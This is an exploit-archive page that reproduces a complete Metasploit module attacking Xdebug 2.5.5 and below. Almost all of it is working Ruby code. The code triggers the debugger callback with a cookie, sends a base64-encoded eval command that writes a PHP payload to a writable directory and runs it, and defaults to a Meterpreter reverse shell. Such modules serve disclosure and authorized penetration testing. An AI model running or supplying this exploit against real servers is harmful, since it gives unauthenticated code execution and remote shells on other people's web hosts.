Twenty Year Anniversary

xdebug Unauthenticated OS Command Execution

xdebug Unauthenticated OS Command Execution
Posted May 1, 2018
Authored by Mumbai, Shaksham Jaiswal, Ricter Zheng | Site metasploit.com

This Metasploit module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.

tags | exploit, web, arbitrary, php
MD5 | f41618034e1f76ddd17f42794e9dc6c3

xdebug Unauthenticated OS Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => 'Sep 17 2017',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))

register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
])
end

def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res.headers}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end

def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})

client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close